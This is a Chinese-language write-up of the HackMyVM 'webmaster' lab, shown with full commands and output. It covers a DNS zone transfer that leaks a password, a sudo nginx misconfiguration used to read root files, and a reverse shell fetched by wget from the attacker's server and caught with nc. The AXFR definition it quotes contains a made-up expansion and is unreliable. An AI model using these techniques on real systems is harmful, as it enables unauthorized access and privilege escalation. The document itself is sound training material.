guayu-kakeru
0%

HMV-webmaster

发表于 分类于

HMV-webmaster靶机复盘

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.179.226
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-10 10:36 CST
Nmap scan report for 192.168.179.226 (192.168.179.226)
Host is up (0.0013s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 6d:7e:d2:d5:d0:45:36:d7:c9:ed:3e:1d:5c:86:fb:e4 (RSA)
|   256 04:9d:9a:de:af:31:33:1c:7c:24:4a:97:38:76:f5:f7 (ECDSA)
|_  256 b0:8c:ed:ea:13:0f:03:2a:f3:60:8a:c3:ba:68:4a:be (ED25519)
53/tcp open  domain  Eero device dnsd
| dns-nsid: 
|_  bind.version: not currently available
80/tcp open  http    nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
MAC Address: F2:B2:84:58:6C:F6 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 1 hop
Service Info: OS: Linux; Device: WAP; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.29 ms 192.168.179.226 (192.168.179.226)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.38 seconds

这里比一般的靶机多了一个53端口,这个端口一般是用来做域名解析的,所以先留个心眼,说不定就要修改hosts文件了

web探测

1
2
3
4
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.179.226                      
 <img src="comic.png" alt="comic"> 
<!--webmaster.hmv-->

给了张图片和一个注释。去浏览器中打开也没有其他信息,开始目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root㉿kakeru)-[~/tmp]
└─# gobuster dir -u 192.168.179.226 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.179.226
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================

竟然什么也没有
结合刚才有开放的dns服务和直接访问web给的注释,我怀疑是不是要改域名,所以编辑一下/etc/hosts再去访问,但是结果还是一样的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root㉿kakeru)-[~/tmp]
└─# vim /etc/hosts      

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.179.226
 <img src="comic.png" alt="comic"> 
<!--webmaster.hmv-->
                                                                                                                    
┌──(root㉿kakeru)-[~/tmp]
└─# cat /etc/hosts                                   
127.0.0.1	localhost
127.0.1.1	kakeru.localdomain	kakeru
192.168.240.113 dc-2
192.168.179.226 webmaster.hmv webmaster
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

有关于dns服务的工具我想到的只有dig了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
└─# dig @192.168.179.226 webmaster.hmv

; <<>> DiG 9.20.4-3-Debian <<>> @192.168.179.226 webmaster.hmv
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38750
;; flags: qr aa rd; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: f32eda80cb81fb45c347235f67a96b271532378304054959 (good)
;; QUESTION SECTION:
;webmaster.hmv.			IN	A

;; AUTHORITY SECTION:
webmaster.hmv.		604800	IN	SOA	ns1.webmaster.hmv. root.webmaster.hmv. 2 604800 86400 2419200 604800

;; Query time: 63 msec
;; SERVER: 192.168.179.226#53(192.168.179.226) (UDP)
;; WHEN: Mon Feb 10 10:57:43 CST 2025
;; MSG SIZE  rcvd: 115

┌──(root㉿kakeru)-[~/tmp]
└─# dig 192.168.179.226                                                          
;; communications error to 192.168.179.180#53: timed out
;; communications error to 192.168.179.180#53: timed out

; <<>> DiG 9.20.4-3-Debian <<>> 192.168.179.226
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 27766
;; flags: qr aa rd ra ad; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;192.168.179.226.		IN	A

;; ANSWER SECTION:
192.168.179.226.	0	IN	A	192.168.179.226

;; Query time: 15 msec
;; SERVER: 192.168.179.180#53(192.168.179.180) (UDP)
;; WHEN: Mon Feb 10 10:56:55 CST 2025
;; MSG SIZE  rcvd: 49

但是我直接用没有解析出来,看了下wp,用了dig axfr

1
在 dig 命令中,AXFR 是一种查询类型,用于请求 DNS 区域传输( Authoritative Xerox File Replication)。它用于从主 DNS 服务器获取整个 DNS 区域的所有记录,通常用于备份 DNS 记录或在主 / 辅助 DNS 服务器之间同步数据。

用这个果然查到了信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root㉿kakeru)-[~/tmp]
└─# dig axfr @192.168.179.226 webmaster.hmv 

; <<>> DiG 9.20.4-3-Debian <<>> axfr @192.168.179.226 webmaster.hmv
; (1 server found)
;; global options: +cmd
webmaster.hmv.		604800	IN	SOA	ns1.webmaster.hmv. root.webmaster.hmv. 2 604800 86400 2419200 604800
webmaster.hmv.		604800	IN	NS	ns1.webmaster.hmv.
ftp.webmaster.hmv.	604800	IN	CNAME	www.webmaster.hmv.
john.webmaster.hmv.	604800	IN	TXT	"Myhiddenpazzword"
mail.webmaster.hmv.	604800	IN	A	192.168.0.12
ns1.webmaster.hmv.	604800	IN	A	127.0.0.1
www.webmaster.hmv.	604800	IN	A	192.168.0.11
webmaster.hmv.		604800	IN	SOA	ns1.webmaster.hmv. root.webmaster.hmv. 2 604800 86400 2419200 604800
;; Query time: 59 msec
;; SERVER: 192.168.179.226#53(192.168.179.226) (TCP)
;; WHEN: Mon Feb 10 11:04:54 CST 2025
;; XFR size: 8 records (messages 1, bytes 274)

john.webmaster.hmv. 604800 IN TXT "Myhiddenpazzword"这条信息是可疑的
尝试ssh登录john账户,果然可以登录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(root㉿kakeru)-[~/tmp]
└─# ssh john@192.168.179.226      
The authenticity of host '192.168.179.226 (192.168.179.226)' can't be established.
ED25519 key fingerprint is SHA256:Pc29l65Be7facFkvVvZRZLlHBJBvwLH5bOciipZXstQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.179.226' (ED25519) to the list of known hosts.
john@192.168.179.226's password: 
Linux webmaster 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Dec  5 05:38:56 2020 from 192.168.1.58
john@webmaster:~$

提权

有一个nginx的sudo指令,查查提权方式
找到一篇文章说可以指定nginx的配置文件,仿照示例配置文件写利用配置文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
john@webmaster:~$ sudo /usr/sbin/nginx -c /home/john/nginx.conf
john@webmaster:~$ cat nginx.conf 
user root;
worker_processes 4;
pid /tmp/nginx.pid;
events {
        worker_connections 768;
}
http {
        server {
                listen 1234;
                root /;
                autoindex on;
        }
}

然后在web端访问1339端口就可以读取任意文件了

1
2
3
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.179.226:1234/root/root.txt
HMVnginxpwnd

做完之后又在网上找到第二种思路
这个/var/www/html竟然有写入权限

把反弹shell的php文件上传上来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kakeru)-[~/tmp]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.179.226 - - [10/Feb/2025 11:36:35] "GET /php-reverse-shell.php HTTP/1.1" 200 -

john@webmaster:/var/www/html$ wget 192.168.179.83/php-reverse-shell.php
--2025-02-09 22:36:35--  http://192.168.179.83/php-reverse-shell.php
Connecting to 192.168.179.83:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5496 (5.4K) [application/octet-stream]
Saving to: ‘php-reverse-shell.php’

php-reverse-shell.php        100%[==============================================>]   5.37K  --.-KB/s    in 0s      

2025-02-09 22:36:35 (26.9 MB/s) - ‘php-reverse-shell.php’ saved [5496/5496]

这样在web访问这个文件之后,本地监听,也能得到root的shell

1
2
3
4
5
6
7
8
9
10
┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234              
Linux webmaster 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64 GNU/Linux
 22:38:55 up  1:03,  1 user,  load average: 0.00, 0.00, 0.04
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
john     pts/0    192.168.179.83   22:08   47.00s  2.57s  2.57s -bash
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# whoami
root

总结: 我学到的:dig对dns解析的作用以及dig的axfr作用(获得整个dns服务区域的记录) 还有nginx的sudo提权,通过修改配置文件可以访问任意文件。最后有一个通用的思路尝试/var/www/html能不能写入,如果可以就上传反弹shell